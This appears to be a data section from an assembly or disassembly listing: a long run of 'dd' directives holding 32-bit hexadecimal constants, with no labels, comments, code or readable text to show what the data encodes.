dd 96F670B8h, 910D0937h, 115E21FFh, 119F1097h, 0AB458B5Ch
dd 7FFD89A1h, 91BA6C5Fh, 0A5FD911Eh, 29712591h, 602BBBD6h
dd 0DEBF23B8h, 95EE8D21h, 9CC9DF70h, 21EE908Eh, 96120895h
dd 2CDF094Ch, 651F9159h, 0E5E28CF5h, 6EE32F3Fh, 79FF23F5h
dd 1EAE26F8h, 0BB90D290h, 0ECD64DDEh, 0FA601FFDh, 0BB8B39DBh
dd 1C9E8C5Ch, 0CEABEF52h, 0A14C137Fh, 0FF299A71h, 772171BDh
dd 74627879h, 0EDB044FFh, 0FD6DF045h, 6C6AFF66h, 0B78D6A6Bh
dd 61FF1AFBh, 2C35614Fh, 0F85E5C58h, 0A36B5C5Dh, 41F537CDh
dd 335DFF53h, 2F594F3Dh, 0A5FF4B39h, 174735F8h, 0FF18CE78h
dd 2C9E40C9h, 98E0FA13h, 3A3834FFh, 85BB3839h, 2FE8FFC9h
dd 2F302E2Ah, 75B7262Eh, 0FFA2FD9Ch, 5C22A5FAh, 2A200Eh
dd 1D1B17FFh, 628C1B1Ch, 0EACBFF8Ch, 0F92E78Fh, 0DFFFBEBh
dd 9F7033Dh, 0FFFD7F74h, 405DD54h, 0EB01EF40h, 2085FDE2h
dd 874BA2DFh, 0C9FFE287h, 2F8A9D27h, 0FFE7F0F5h, 0EBECEDEBh
dd 9B7C384Ch, 0E1DDE2FFh, 0ECE1E2E3h, 9152FF28h, 0D9DE18B0h
dd 4FFFAA54h, 0A54DF7D2h, 0FFB0CD50h, 0B368CBB9h, 0C7C8C6C2h
dd 0D70C6FFh, 0AB957637h, 69D0FFBDh, 0F6BABFF9h, 26FFB7BBh
dd 5B02188h, 0FF7EAE9Ch, 0ABA9A50Ch, 0F066A9AAh, 78591AFEh
dd 80AAA08Eh, 9CFFEC26h, 2CE8A59Bh, 0FF64924Bh, 916AEDE5h
dd 5E4E8490h, 0FF748C85h, 517C68DEh, 6D828384h, 0AD4C54FFh
dd 7B7975BCh, 0E079A17Ah, 4829EA7Fh, 0FF25455Eh, 6B59E96Ah
dd 3C556DAEh, 176268FFh, 426C6250h, 555EFF4Ch, 9C2F4866h
dd 43FFCFB9h, 6E2892Ah, 0FF514F4Bh, 96654F50h, 341EFFC0h
dd 361646F6h, 22FF1D30h, 3BAC13B1h, 3FFF79FAh, 4036243Ah
dd 0FF322016h, 376E123Ch, 922B192Fh, 0FC1562FFh, 7013A236h
dd 17EFFFE4h, 1E1FF333h, 24E51A08h, 0F6FF04FAh, 0F21C1200h
dd 0DB0AE3FCh, 13FF431Ch, 400E9F2h, 4B87FF06h, 0E9D3B475h
dd 0BCD1FFD0h, 1BF6E4EFh, 0F1FEEDB7h, 9CF1F2F3h, 8337823Eh
dd 0B8FFE8D6h, 64B96160h, 0FF1F30E1h, 0DCCAE0E3h, 0D8C623ACh
dd 5161A8F8h, 629754A9h, 0BCFFA4BDh, 0CAB8D728h, 0FFB4659Ah
dd 5821FB9Bh, 0ACC2B001h, 0A78EBEFFh, 0BABB8DB5h, 3BADFFB9h
dd 0A8B4B5B3h, 0B0FFB1B8h, 0E8AB99AFh, 0FE7C32A8h, 9016A42Dh
dd 171525A2h, 0FFF4F2E9h, 7AA49A88h, 93D79684h, 9C9280FFh
dd 8F7ECE72h, 958BFF79h, 8886826Bh, 6AFF8687h, 5536F7CDh
dd 0ED207D6Bh, 0FF7874A4h, 0BF4E78FFh, 5D4728E9h, 0FF3F846Fh
dd 70FF34E4h, 2D5D4BFDh, 4999FFDBh, 5755515Ah, 2EFF5556h
dd 2405C69Ch, 0FE4D4B47h, 98C94B4Ch, 0FF42FBDCh, 0D59510FFh
dd 3C3DFF15h, 380AE230h, 32FF2E37h, 40323334h, 0FFE2A379h
dd 0B1FEAE01h, 0F9A13626h, 3421A4FFh, 0FF291F0Dh, 1C0DFF5Bh
dd 18191713h, 5EFF2517h, 99E6C788h, 0FF0B94E3h, 0A0804C0h
dd 4F4C0809h, 0D7B879FFh, 0FF00FEFAh, 4551FFFEh, 7ACDAE6Fh
dd 0F2FF7DCAh, 0F1EFEBC0h, 0FF76EFF0h, 0BE9F6036h, 0CA33E6D4h
dd 16B7D0FFh, 0B2CB4195h, 4002C3FAh, 0D5C37FFFh, 0D0CCB5DFh
dd 0D0D1FFD2h, 8041179Dh, 0B9FF079Fh, 94C4B2C8h, 0FD93BB12h
dd 0B3BFC0C1h, 0FFBF8ED5h, 0B6B5A4AEh, 0B19FFFB5h, 0AD9B6481h
dd 97C48DB7h, 22D0BFA9h, 0D7A2257Ah, 0A1A5E0F8h, 0DA379C98h
dd 0E3FF649Ch, 816B4C0Dh, 0FF1B6393h, 8F908E8Ah, 1FDBC98Eh
dd 0E853EFFh, 5482015Ah, 455FFF1h, 7B69D37Dh, 65FF894Bh
dd 0E70E504Ch, 0FF73716Dh, 0BE0B7172h, 56682102h, 0C3A23DFFh
dd 64625EEAh, 8E62FF63h, 5912F3AFh, 29FF5947h, 2555432Dh
dd 0FF513F9Ch, 4D3BCEF3h, 1E37D978h, 5EF467FFh, 39F545BBh
dd 403BFF84h, 0F1D28A3Fh, 3AB73008h, 0A32136FEh, 0AC7F8B33h
dd 982CAF04h, 0A6FFFFB3h, 17655927h, 22FF1026h, 275E022Ch
dd 1B1A161Fh, 0DCFF1AFFh, 11CAAB67h, 0FF8DE69Ah, 0E195270Eh
dd 0F5930988h, 0E71107FFh, 30402FEh, 496BF902h, 7FD1B273h
dd 0EF26BBF1h, 0F4FFF5F3h, 8440A0F3h, 0FF2AEAA3h, 0BCD5EBEFh
dd 0D0F370C3h, 0C2ECE2FFh, 0DEDFDDD9h, 2440FFDDh, 0C2AC8D4Eh
dd 0D2FFCDD4h, 0B0DAD0BEh, 0FFCDCBC7h, 12B1CBCCh, 169A7B3Ch
dd 0E6B804F6h, 0A9FFFF95h, 281C8BBBh, 0B4FF3B8Ch, 34B2A0F0h
dd 0F8839CBCh, 0A445DEF4h, 0A8FFDFA8h, 0FA19EFECh, 9F8D7758h
dd 9BA797A9h, 2257FF5Dh, 0F7941D6Ch, 12FF6780h, 8C884E82h
dd 0FF8C8D8Eh, 3CFDD334h, 5383715Bh, 7E7A58FCh, 2F7E7F80h
dd 752E0F63h, 0E34AE8F8h, 0FFDE8272h, 5F17278Ah, 6662585Eh
dd 666768FFh, 16D7AD9Dh, 32DAFF35h, 0E3CA5ADDh, 55FFDE2Dh
dd 0CD28D20Bh, 0F0C5FC50h, 39434F9Fh, 0CB4AFFBFh, 0FF43CE1Bh
dd 29162F00h, 457CCEF7h, 64FF3DA4h, 0FFDB99C6h, 14F52513h
dd 22E1201Ch, 7F2B2021h, 5EFD091h, 42C6E717h, 1EFF9601h
dd 0F0D09FDh, 4BFF0D0Eh, 0DCBD7E54h, 0FFD404F2h, 82D5878Bh
dd 0FAF6DEFDh, 0FAFBFCFFh, 0AA6B4193h, 0F0ECC6C9h, 76F0F0FFh
dd 0E70E2D3Dh, 72FFFBFh, 0FFE72229h, 0E9DFCDE3h, 0DCDAD6BFh
dd 8CDADBFFh, 0D18A6B27h, 0D2D6FF11h, 0AAC4DE22h, 0CAE1CBC6h
dd 0BFFFCA07h, 0C0AE98ADh, 0AAFFEF90h, 0A69CC6BCh, 0FFD5CCB8h
dd 4184B4A2h, 0D76E859Eh, 0FFFF6D8Dh, 0A6A2C67Bh, 96A6A7A8h
dd 5637F3FCh, 0B9D8B9Dh, 98FD9409h, 7698999Ah, 8FDF2CE5h
dd 3F0AFF23h, 0FF868480h, 0CB0D8485h, 695334F5h, 0E80B50FFh
dd 46766456h, 7260FEA3h, 74AEA342h, 75FFDF6Fh, 0FF67554Bh
dd 3B94771h, 0CD5763F4h, 5E5F34FFh, 2E765105h, 0C558FF59h
dd 8651D829h, 0FF4B4E4Ah, 9513FF4Eh, 331DFEBFh, 0CEFFAB45h
dd 3EC516B2h, 1B3B3712h, 3EFF3BFFh, 32EBCC88h, 63333572h
dd 7BFF52FFh, 2025DEBFh, 0FF252624h, 0B5710B24h, 0F0091BD4h
dd 78627BFFh, 157FEB04h, 100CFF96h, 3F101112h, 0C0F8A15Dh
dd 87DC8407h, 0D7F0B297h, 0C00D27FFh, 0FDFEFCF8h, 435EFDFCh
dd 0EECBAC6Dh, 0FF5FA92Ah, 0A2833F8Eh, 0E9D7E9FFh, 0BA64C9F3h
dd 0ABE2FF5Fh, 0E0E1DFDBh, 2CFF88DFh, 0C4D68F70h, 0FFB6E0D6h
dd 0B2DCD2C0h, 0CEAF7024h, 0BFF3C2C1h, 4717C967h, 0C4FFC50Eh
dd 0BD5EB7C3h, 0FFA8BEBFh, 0A40E8ABAh, 0F2E659B6h, 9DB3A1FEh
dd 3E64EA84h, 0B1F9FFB1h, 0A0593AF6h, 799C8AFFh, 6F9793D2h
dd 0E4C497FFh, 0FF8EDF4Bh, 6E988E7Ch, 0D65A8A78h, 0FF8581D2h
dd 0D20085F0h, 6A7CDFBFh, 0FF5C867Ch, 58827866h, 7475736Fh
dd 9B1273D2h, 586A23FFh, 544A746Ah, 0D6D63BFFh, 62605C73h
dd 0B260FF61h, 2F10D1A7h, 61F85745h, 54439337h, 451DF237h
dd 70326481h, 0FF325E4Bh, 0CB18815Fh, 39FFF140h, 3D3E3F3Dh
dd 0FFCE8A96h, 342234EDh, 2F2B2561h, 6CFF31B7h, 0DFC0FE7Ch
dd 0F6261426h, 41FF3786h, 1D19D6B1h, 0BE1DFFFFh, 0ECCD8E64h
dd 1E14FF02h, 2CE5FEF4h, 0F9FF1B66h, 86F2880Bh, 0FC0481DCh
dd 7CD781EEh, 0FF0BF5FFh, 0E756FFCDh, 0E3E82AF9h, 0E6D2F7CAh
dd 0A33AFF14h, 0E6DF5A3Ch, 7FB6FF5Ch, 7DCFFF08h, 0AD68FF26h
dd 0D4D0ACCDh, 0D5FF10D3h
dd 0CEBC0DD1h, 0FACBCE0Ah, 0C4439C50h, 92FDDE4Fh, 0FFEFB9E7h
dd 2E04FEBDh, 0FD006DA5h, 5EB13689h, 0FF6FAEAAh, 0FDF579AEh
dd 2C7D5E1Fh, 0C32B277Ah, 950C70FFh, 0FFABFF23h, 6A4B0CE2h
dd 169397D2h, 281164DBh, 8B89FF85h, 0D6F2898Ah, 80C2391Ah
dd 60DB1D6Eh, 99FE4CFFh, 70797CB8h, 6E5F7674h, 0AC24E5BBh
dd 8567FF43h, 320463FCh, 1A584356h, 63FF97FEh, 4495FF39h
dd 7E524056h, 23ED3CE3h, 0FF489DABh, 7246C51Eh, 4445433Fh
dd 8AF943F5h, 351FBCB4h, 0FF6F3B39h, 0FFCA8630h, 301E30E9h
dd 2B273695h, 2B2C2DFFh, 0DB9C7295h, 211DE5FAh, 6862FA23h
dd 0C7F0D192h, 0E0640FFFh, 5F0EC7A8h, 0C2E087FFh, 95DEFFF7h
dd 0D98DBDC2h, 5F90180h, 23CFFFEDh, 0DB80D37Fh, 0FF65CBE4h
dd 0F1DFDC69h, 0EDDBD1FBh, 97CDF7FFh, 0E24FDF2Bh, 90E5FAE6h
dd 6EC2D824h, 0DCCB1BFEh, 0B2FFFF05h, 0D5D7148Fh, 6AD2D711h
dd 0D4134FDh, 0B4FF49FFh, 0BD91B1C6h, 0FFC2C3C1h, 320891C1h
dd 0B7B39071h, 0B7B8B9FFh, 6748049Bh, 0F5FF4BAEh, 0FF7399D6h
dd 2E9B79FFh, 37A2217Ah, 0A1A4E0E3h, 0EE6D7FFFh, 0A1699987h
dd 969490FFh, 0DB2F9495h, 6344FE05h, 88286079h, 93FF114Dh
dd 0F14CFFC1h, 775100CEh, 7DADE56Ch, 0ECFF02FEh, 78FF4F79h
dd 50DBB1F3h, 31FF2F1Fh, 32FCE259h, 53525AE5h, 57FF6E57h
dd 0FFBEA52Ch, 4E3C2607h, 4A3850CFh, 0B8341AC1h, 17F67CFFh
dd 81C4BFFh, 2F2BCFFFh, 0BF3533C0h, 0A47A1AFFh, 25FF02E3h
dd 292A2B29h, 0F49A7001h, 1F1BF8D9h, 0EE1FFFBFh, 8DCF9066h
dd 0FF8DFFEEh, 0CEFF1851h, 36FFB7C5h, 3F662356h, 0E381CE7Eh
dd 1DE271F6h, 3D67D47Fh, 0FFE4A0B1h, 0EAEBF332h, 24E8D727h
dd 0CFE5EDFFh, 41396DB6h, 3B1FFCAh, 0D7C51F23h, 0C1FF86FEh
dd 0CAAFA3D3h, 0FFCFD0CEh, 5F1B98CEh, 9A4EC57Eh, 95C241F8h
dd 0FF1BBFBBh, 50E30CC3h, 7FFFB66Fh, 0B1ADAC86h, 0B1FFB2B3h
dd 6122F867h, 0FF7D3380h, 2AB3A52Eh, 18A02578h, 0BF9D99D0h
dd 0EA969D96h, 94D04D2Eh, 748CBF82h, 1FFD657Eh, 0FFFFFC83h
dd 0E61E5C75h, 818B7D6Fh, 0BC817F00h, 5031F2C8h, 0E046FF1Fh
dd 5F70B9CBh, 6F6D69FEh, 0E86DE96Eh, 647CDFBAh, 0B65635Fh
dd 0AAFA5FFFh, 483213D4h, 17320B36h, 0A13660FDh, 3D7E0192h
dd 0B9947924h, 2A54FFDFh, 47FD4541h, 8C8F4546h, 2AE46FB6h
dd 57FF4D3Ch, 35BE0DC3h, 0FF3C738Ah, 3C051E34h, 2A263B85h
dd 0FF2AFF0Bh, 0DA9B71DFh, 0A3F6A8F9h, 99BE1EE2h, 6419D25Fh
dd 0FF0B1612h, 6349FE16h, 80DC6A7h, 0CFFB70Ch, 9D59FF8Fh
dd 3F103BCh, 0FF067B9Eh, 6EFD0833h, 0EDCFEBF7h, 0EEDCFE6Fh
dd 2ACEE0F8h, 0E7FF5FD9h, 0FFD17813h, 0FF3240B8h, 0DB5AB367h
dd 0D8D407FFh, 8ED8D9DAh, 8849EC1Fh, 0C567FFA7h, 2AC5B3FEh
dd 0C2C0BCCBh, 31072A5Eh, 0B6B21FB7h, 0FFB6FF0Bh, 6627FDF7h
dd 0AEACA885h, 0A4ACADFFh, 0A35C3DF9h, 1C78FF91h, 738C5775h
dd 52EB572Ah, 6D7B6E22h, 64CBFF9Ah, 15C268B8h, 75B7FF70h
dd 86FA7471h, 82706690h, 0E7769617h, 7C7D78FEh, 80EB4E67h
dd 0BB93FF93h, 54803AEDh, 0FF468B1Dh, 0ED27C872h, 0FFFF3763h
dd 2BC93A64h, 3FD453C4h, 852026F1h, 59FF231Ah, 0BE17CB3Fh
dd 38313FF0h, 3CFFBF3Ch, 0ECAD83D8h, 8210BFFh, 1C185A64h
dd 9F1EF903h, 68282450h, 0B905DE28h, 0FF271FD8h, 0EB1B09F6h
dd 0FA32FF1Bh, 0A3F8094Ch, 7C4FA98Bh, 0F4C17379h, 5ECAF055h
dd 0F01C9B56h, 55518E40h, 28F24EFFh, 2C1423C9h, 0D14150CFh
dd 0AA036131h, 3EB8F7Dh, 0B0000FF6h, 4C6B8A63h, 2556A225h
dd 90EA8AC4h, 0D002116Dh, 40E8F9F8h, 70BDA307h, 0B800EBE8h
dd 0DF00EA55h, 707ED7Dh, 8A09FA08h, 0DE296886h, 0F911E341h
dd 0E9DE8C37h, 161AFCFFh, 0D01EF042h, 22F4F63Eh, 0E8EC452Eh
dd 0ECDFB89Ah, 0B82A5D2Ah, 2F2FC5FFh, 0BC643130h, 7B11A170h
dd 1D363A7Fh, 0FF483F4Fh, 0B381A03Fh, 8846A842h, 4AAC66FFh
dd 4DA36A84h, 4F4EFF4Dh, 7716DE8Ah, 54FFBEA8h, 58B21D0Ah
dd 0A9B57C96h, 617F925Fh, 4120EC43h, 698FFF9Ah, 326B6A69h
dd 4BFC0AE0h, 5726FA74h, 78706F78h, 798B07C4h, 962F7162h
dd 8281662Fh, 0C10BFF57h, 8B637BA2h, 64898089h, 908F7F82h
dd 0B0F71F41h, 957D91FFh, 9971B955h, 75BDFF51h, 49903D9Dh
dd 0FAABA1h, 0A8D1A4DEh, 96AF4837h, 5834F8FFh, 0B4B3B2B0h
dd 0F339FFC1h, 0BA52459Ch, 0BED1BDBCh, 0E6F9BF42h, 0B9C6BAC7h
dd 2260C6FFh, 25EC06C8h, 33CFA3CFh, 0B05EB47Fh, 0F8A9D2F1h
dd 0C5DBA6DBh, 356CDF37h, 0E28CE30Bh, 5F24B389h, 9DEB0365h
dd 0EE07E038h, 1A15586Bh, 0B2D9DBB7h, 0F80337FFh, 0FCFBFB11h
dd 7068F8FDh, 5FFE2544h, 7060505h, 6E84FFC4h, 0FACC082Fh
dd 12FF6C0Fh, 6BC7126Fh, 0FF196815h, 4019F10Ch, 201EF605h
dd 82221FFh, 230241A9h, 0EC2BFFC3h, 2ED9ED07h, 31A1C3EEh
dd 34457BDEh, 98BFFFB5h, 3E3D3DD3h, 0CC02FF3Fh, 0AE406726h
dd 68FF8A44h, 4C4B4BA1h, 0FBC0854Dh, 0DEAE7514h, 5478B82Eh
dd 0EEB7EB54h, 5EFF5D5Dh, 6ECBA5Fh, 0FF8E6047h, 17964365h
dd 9BDA6981h, 706C85F8h, 7197578Ah, 9CFF56B8h, 9082937Ah
dd 0A3E1C87Fh, 217D7115h, 4B6DA2D2h, 89FF88E5h, 0A9E8064Dh
dd 8992648Ah, 967F139Eh, 9BE7B658h, 5D274BE8h, 0FF286985h
dd 48826CA2h, 668668A6h, 0A9845FB7h, 450AFF36h, 43CA62ACh
dd 0DFF7632h, 52B8B7B6h, 0FDA721B8h, 0C1C0BDC3h, 0E92FB8AFh
dd 0FF0676C4h, 0C921C938h, 380FED01h, 0D339D0FFh, 0E5D5D4D3h
dd 0FD9CFF58h, 0A6DFA126h, 9AFF18DFh, 9CE299E2h, 0AB2AE40Eh
dd 0EB7F50C8h, 6280EDECh, 0F6D5F094h, 0CD6FF718h, 0B7F81045h
dd 71CFFFFAh, 0FD24BBF8h, 7137F0C3h, 45FF1C05h, 0C109E1D8h
dd 0E00EE62Dh, 5E121110h, 13327115h, 1947DF20h, 0C5D31FF7h
dd 0AABFC83Fh, 0AB322423h, 2D0CFF43h, 212469A1h, 31FFC72Fh
dd 0BA333231h, 0FE1372BAh, 3B3BD1C4h, 25A73D3Ch, 4665FA77h
dd 175C47A8h, 0FF4A3455h, 0A5A44A37h, 51504F4Fh, 10DC22FEh
dd 59BFAA71h, 3BD45FA0h, 0F47B1AD2h, 69618A9Ch, 0A8E5F2Dh
dd 21FF1736h, 4A29FFE3h, 7282B193h, 75FF759Bh, 0F6EB7776h
dd 0FF805F3Eh, 81047D07h, 8B8169DCh, 866E19EDh, 0A38AFFFFh
dd 8BAAE901h, 5FE0937Bh, 925F7CB3h, 17A79897h, 99B8FFE1h
dd 816D72FFh, 4EE2ADF1h, 0AAA9B66Fh, 8AE16DACh, 0C2B22C1Bh
dd 0FBD5B2C9h, 0FB314952h, 0CEBF7A08h, 2FE015BFh, 0FFC4C3EAh
dd 0ECA34BF6h, 55FC1DCDh, 0A3CCBC80h, 0FF3B0D4Bh, 0D7D6D5D5h
dd 0FF9E562Ch, 0BF1C20C1h, 0E2E0082Fh, 3CFEE4E3h, 15CCA369h
dd 0FFDFEA02h, 0B57FF7EEh, 1F0FD6FFh, 5A4069F6h, 63F9FA12h
dd 0DF168803h, 0B3020166h, 2241FD8Bh, 750A76FBh, 0FFE6AA4Bh
dd 2EDBDB0Dh, 151412FAh, 958416FFh, 0F41F3E7Dh, 1F1EFF1Ch
dd 67AD4020h, 0CDFFD900h, 5609E525h, 0B12C5128h, 1A9FFF19h
dd 0F6FF38D2h, 0F23CD61Ch, 0FC462B60h, 4947AF1Ah, 0F20BA3C3h
dd 0BC8DFFFBh, 0EF53A44Eh, 0BCF8037Bh, 58575654h, 781F685Fh
dd 5DFEB5A1h, 618941ADh, 0FFC6CF78h, 739B7FD9h, 9FFA53BFh
dd 90FB7977h, 7C7B5AB7h, 3BF101FBh, 7FFF7DA4h, 856DA549h
dd 62FFA945h, 8E8D8C8Ah, 0FFD51FEFh, 977F6FB6h, 9A73B75Bh
dd 4ED10116h, 0A09F2FBFh, 0FF2E21A1h, 4CA281C0h, 6A8A64AAh
dd 87AD5EFFh, 7FB35BA5h
dd 0B45CC393h, 0DDF746FFh, 55B998FFh, 0B429CFBDh, 0C4B3C0FFh
dd 0C9C92F2Ch, 0C6CBFFCAh, 0D4EBAA40h, 53E0D03Ah, 185F3E22h
dd 72D83236h, 0DC36ECFEh, 0E309FE27h, 0FEBCFFD6h, 16CDAC68h
dd 0FFDEED03h, 0AD7CE8EFh, 1DF0FFF0h, 0F9F8F7F7h, 98FB76E7h
dd 117FAD9h, 14037FFFh, 0C236288h, 1309E2F8h, 0FF4738D5h
dd 51E59B39h, 0A8D8EB32h, 0B8DBFF94h, 21AD00DDh, 285FFFB9h
dd 0E02EC057h, 0F0FF1C0Eh, 0C6F299C2h, 0FFC0F735h, 7039D238h
dd 3CD5A8B4h, 0F6F69AE9h, 699F72FFh, 675646E4h, 552FFF5Bh
dd 0B25C592Ch, 0FF1B5C5Ah, 25EFDBA6h, 67FA8F1Dh, 68808D69h
dd 976CFF5Ah, 0B540B4Ah, 0DFF7066h, 7B03BA74h, 0F5117B0Ch
dd 7F7E7C94h, 0C70D662Fh, 0FF79BFA0h, 168861h, 0B7FFFFC6h
dd 0F4977837h, 707A09DFh, 9C9B9A6Fh, 0FB13F021h, 0FFBFA584h
dd 0ED2F8569h, 0CD665B58h, 0FE4680C6h, 0B15A90FFh, 5DAAD2FBh
dd 0CCA7B5E9h, 4F251FFFh, 3F8DE685h, 0E0C9FF95h, 14C5CB23h
dd 0B7E3CEB4h, 19FF74CEh, 0DE30FF02h, 0E137D828h, 0C5FFE185h
dd 0F1B16A21h, 3AFF8C14h, 1214F68Fh, 34FA1CFFh, 51FF10DAh
dd 263F8123h, 0EC7E0D7Dh, 8FF2F04h, 4FEC85D1h, 64FFF128h
dd 3278FE1Eh, 0B5E65795h, 0C89F0BFFh, 6E826FFh, 0AE42ACCh
dd 0D62FFFC0h, 33DB85FCh, 0DCFF13FFh, 38373634h, 0DB5FB74Dh
dd 49FF3918h, 91AB74CBh, 49AF73FFh, 604B4A49h, 6B0AFFC2h
dd 5C50BAACh, 55FF2B3Ch, 9BC85928h, 0E8B65CADh, 5FD7505Ch
dd 1B296C48h, 71188D65h, 806881FFh, 7284A3F0h, 9829F17Eh
dd 156FD177h, 0FF7A88B9h, 93727E90h, 0BB171FFh, 0FF70C9D2h
dd 0C804DF3Fh, 4EFF72A9h, 65539163h, 0FF947E94h, 98727A9Dh
dd 9C76BC56h, 608052FFh, 5065A351h, 0AB4CFFA6h, 47D2B98Ah
dd 0CCFFA1AFh, 76DDB25Bh, 0BB45E32h, 49FF7895h, 0BEBC54BBh
dd 0FE27C0BFh, 0C1E0A74Fh, 0B7C83307h, 23570CFFh, 0DA3C3F4Ch
dd 0FF10B789h, 523FE10h, 0C38268FFh, 4229B6ECh, 6851C058h
dd 0DFAEF1E2h, 5D98F18Ah, 4DD5D051h, 54D92274h, 0EB286292h
dd 190E2BC6h, 0A2DF0E0Ch, 2BE93CDAh, 671614DCh, 98C7246Ah
dd 0A24B086Eh, 0B530E1A8h, 6D0CFB68h, 0E11EDC3Bh, 0FA786259h
dd 0C5326631h, 0B3A4E562h, 0F9AB6A18h, 86A6A3A2h, 3DE4B9h
dd 8634C08Dh, 0C7578A4Fh, 65172A14h, 8CB2A146h, 7F236C3Ah
dd 8FAFF762h, 4CB075A0h, 3B6B58FFh, 0ED014C30h, 0E98E2FFh
dd 0F601BCC4h, 0C0087004h, 0EC5C1276h, 0F4988A83h, 0AF0601C0h
dd 19A291Ah, 0D7B42D15h, 0A9278851h, 85238F2h, 0D275F240h
dd 6CBF035Ch, 0E4D1F2C1h, 0A07F9B1Eh, 0BE50590Fh, 0A03BBFC3h
dd 522A6BDCh, 0C5912004h, 76D2484Fh, 0EF0D5432h, 83FF0D8Ch
dd 442D6FABh, 1263EBCBh, 77C320BFh, 491FD04Ch, 178428C1h
dd 0B7FD2B96h, 0F3C1B3E0h, 5423B697h, 0F11B2027h, 241429D2h
dd 18DFCF57h, 0E667AF41h, 18E1A8C3h, 0D66E01C3h, 8E842D7h
dd 6E6B4BDBh, 2A56B70Dh, 9D93CDC5h, 0A8096481h, 34BC6C3Dh
dd 0D41C714Fh, 22AE03B1h, 48DF2D92h, 2FE57D66h, 9E9E2B8Dh
dd 0C6E5AC4Dh, 4E80C20Dh, 3DCA0DFh, 60054FE2h, 0FB93216Ch
dd 8CC8ADBh, 7177C74h, 4185E5Ah, 0BB04E11Dh, 1AEFB03Bh
dd 0E0E5F57Ah, 0D0017A83h, 2D185D0Fh, 80DF11A0h, 908D2C32h
dd 40FA4696h, 1D6C83D7h, 7D63754h, 0DD7C63F6h, 0D659FF1Eh
dd 0F8E66978h, 4C7B1548h, 1F781AD9h, 3549A942h, 0C31007A0h
dd 0FF08B51Bh, 8D228964h, 1C63920Ch, 0D969647Ch, 10EA2601h
dd 1FFE2408h, 6BB9AD03h, 8BD94464h, 0DBD0E31Dh, 683E85Fh
dd 0CB03F6CDh, 341ACC89h, 6227872Ah, 638DD41Fh, 5664A413h
dd 0E8E574D9h, 2C24685Eh, 0C6B82B5Fh, 0F8D806EBh, 0C7C3F1F7h
dd 271D92C7h, 0A8D62241h, 7F0F7547h, 0BEE036Eh, 88052BC6h
dd 705BCEC2h, 3AEBDDBAh, 0C67DE620h, 1A8D0443h, 0B3871185h
dd 0F4C6095Ch, 4233015Ch, 75B2157h, 8FE16469h, 0EFC05A02h
dd 1C9335EDh, 267E1284h, 0D632025Fh, 0A4861854h, 0A7061463h
dd 0FF6523ECh, 4209709Ah, 0ADEE0307h, 2A444358h, 102323A5h
dd 61FF7E82h, 11364D9h, 5E16441h, 0A866B0A0h, 0F566A77h
dd 0CD526A40h, 16467375h, 0F5561775h, 14D32C2Ah, 294A0516h
dd 575F1B08h, 0E790C278h, 867534ECh, 92C0164h, 0C674185Bh
dd 4E598535h, 0AB9DF8FFh, 1E4CA277h, 90D0F868h, 0C057EFF9h
dd 28037DA8h, 6966E861h, 2C026ACFh, 63B30D63h, 2919F06Ah
dd 125AF9E9h, 0B10481EFh, 2E07B4Bh, 0F603DD73h, 0F6E109Fh
dd 3363B76Dh, 16703A9Dh, 9B30E336h, 1CDF49B1h, 6E31DB88h
dd 0E39003h, 5274661Fh, 0E838B9A8h, 2140253Dh, 16B1DB23h
dd 0C415C0A1h, 4F028088h, 0DB490309h, 0FD045708h, 89F79D4h
dd 933B31F8h, 0B4673E2Eh, 0C2A6D509h, 0D334A008h, 48402542h
dd 85CD6120h, 0A2744307h, 0A81BB003h, 0BEFE8FEh, 0CA880000h
dd 0E8DC0BCEh, 122E0000h, 58260BBh, 0E8775511h, 0FFFFF7E3h
dd 0A001EAFFh, 6EE20E0h, 0A0908FFh, 2A498366h, 12FBFFF3h
dd 0FE2471F5h, 53FE1814h, 664D18F2h, 0C3A51D69h, 7F67C3ABh
dd 0D1E7B82Bh, 28FFC228h, 2CC60CE6h, 0FFD9675Dh, 35343333h
dd 1D7CB881h, 0CBFAC6FFh, 0F93DD53Dh, 0B683FF97h, 9345AE44h
dd 0A2E8989Eh, 0EDF4C4Ah, 7615DF08h, 1F0EAFA9h, 783FD74Ch
dd 5CB559FFh, 886EF7D1h, 0ED304266h, 0F44D2CECh, 5F626E80h
dd 91E10E2Fh, 0E586A9B2h, 2B0C747Dh, 0AE0E0DC3h, 0FA8305FFh
dd 876FC383h, 0F2A7FF4Bh, 3D8AF18Ah, 2EF98D66h, 63535585h
dd 0FFB85AB2h, 9D761E94h, 0FFF6A8D6h, 0DC59A049h, 0A95B6639h
dd 7B0F42ABh, 7294AEADh, 23B79675h, 0BC23870Eh, 7FACC9A9h
dd 0E608C628h, 0C9F43A06h, 239F9D9Dh, 0DB23D50Eh, 0A7BBF1DBh
dd 0DFDEF6DCh, 0FE5D9EE0h, 0E50DE1C0h, 0EACC5EAh, 35FF5C67h
dd 0C36F605h, 0FFF911F9h, 0FC82A705h, 7F83007Dh, 77807F4h
dd 5A86F4Ch, 0FFFE754h, 13FBD27Dh, 0FF68E81Dh, 76166B16h
dd 1D6C196Fh, 0EFFAA80h, 261ABBEh, 2A5ADBFDh, 0BF612A59h
dd 0F0AB1FFFh, 0DFFC33C1h, 15BF2A37h, 0AB745671h, 0FEE8460Eh
dd 444343A9h, 8B854045h, 35B66DFFh, 304F324Fh, 0CC53FFBBh
dd 5957BFD3h, 5AF0B3FDh, 4FA05CA6h, 0FF211C0Eh, 4B2AE22Ah
dd 0AB87B08Ch, 0BB720E73h, 6FA93457h, 0F085A474h, 84F780FFh
dd 3F8A6C5Ah, 8E60F5E3h, 0E3FF282h, 0FE95957Bh, 141C9796h
dd 8D98BFFEh, 0E690FF0Eh, 0A4A3A349h, 2AFDB9A5h, 40AE8DCCh
dd 0D521BDAEh, 59B4CAB3h, 0D20E7727h, 0B4D1B852h, 0B030BF0Bh
dd 0CCC02AB3h, 0C42E11FFh, 0CB21DF1Dh, 0CDCCFFCBh, 0F5B4420Eh
dd 0D6FF38D6h, 0D93FD8DAh, 0FFDBDAD9h, 0FB9A52B1h, 0E310201Ch
dd 0E9FF7A02h, 28EA03B8h, 6FF0B7Bh, 778542EDh, 0FFF4F21Ah
dd 7753F6F5h, 1407DEBDh, 0FFFEFCFFh, 478DA500h, 0EDF9C420h
dd 8F3C73BAh, 0F04BEC95h, 0DEE182CEh, 0F7EDEB0Eh, 1EF0795Fh
dd 9F00FA51h, 97DC2843h, 2E903F0Eh, 465E53EDh, 427FCCA5h
dd 80364136h, 3D0E7FECh, 0C39FC101h, 72FFB283h, 3F6AE7F6h
dd 7635DD89h, 0F2FF7757h, 5AFF58B0h, 0D3705C5Bh, 0FF65443Bh
